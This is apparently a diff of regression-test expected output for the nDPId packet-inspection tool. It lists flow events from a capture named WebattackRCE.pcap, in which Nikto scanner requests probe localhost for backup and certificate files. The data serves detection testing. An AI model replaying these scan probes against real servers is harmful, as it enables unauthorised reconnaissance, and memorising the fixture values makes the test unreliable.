{"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1576420277096,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277096,"pkt":"AAAAAAAAAAAAAAAACABFAADCcsRAAEAGyW9\/AAABfwAAAcOuH5Drmkq5YpvrhoAYAED+tgAAAQEICp1m\/JCdZvyQR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1576420277098,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277098,"pkt":"AAAAAAAAAAAAAAAACABFAADCRRhAAEAG9xt\/AAABfwAAAcOwH5DRhn1t\/ojAOIAYAED+tgAAAQEICp1m\/JGdZvyRR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1576420277100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277100,"pkt":"AAAAAAAAAAAAAAAACABFAAC931JAAEAGXOZ\/AAABfwAAAcOyH5BYxOcsixzBAIAYAED+sQAAAQEICp1m\/JSdZvyUR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1576420277106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277106,"pkt":"AAAAAAAAAAAAAAAACABFAAC9aFtAAEAG091\/AAABfwAAAcO0H5ATAFAmoohjQYAYAED+sQAAAQEICp1m\/JqdZvyaR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1576420277109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277109,"pkt":"AAAAAAAAAAAAAAAACABFAADFvlhAAEAGfdh\/AAABfwAAAcO2H5BO24YshrKR94AYAED+uQAAAQEICp1m\/J2dZvydR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1576420277113,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277113,"pkt":"AAAAAAAAAAAAAAAACABFAADF+v9AAEAGQTF\/AAABfwAAAcO4H5AzScKEmziDBYAYAED+uQAAAQEICp1m\/KGdZvyhR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1576420277115,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277115,"pkt":"AAAAAAAAAAAAAAAACABFAADAxXJAAEAGdsN\/AAABfwAAAcO6H5BPqv0Pb+YcGYAYAED+tAAAAQEICp1m\/KOdZvyjR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1576420277116,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277116,"pkt":"AAAAAAAAAAAAAAAACABFAADAsDlAAEAGi\/x\/AAABfwAAAcO8H5B5M4hJ8rxYu4AYAED+tAAAAQEICp1m\/KSdZvykR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
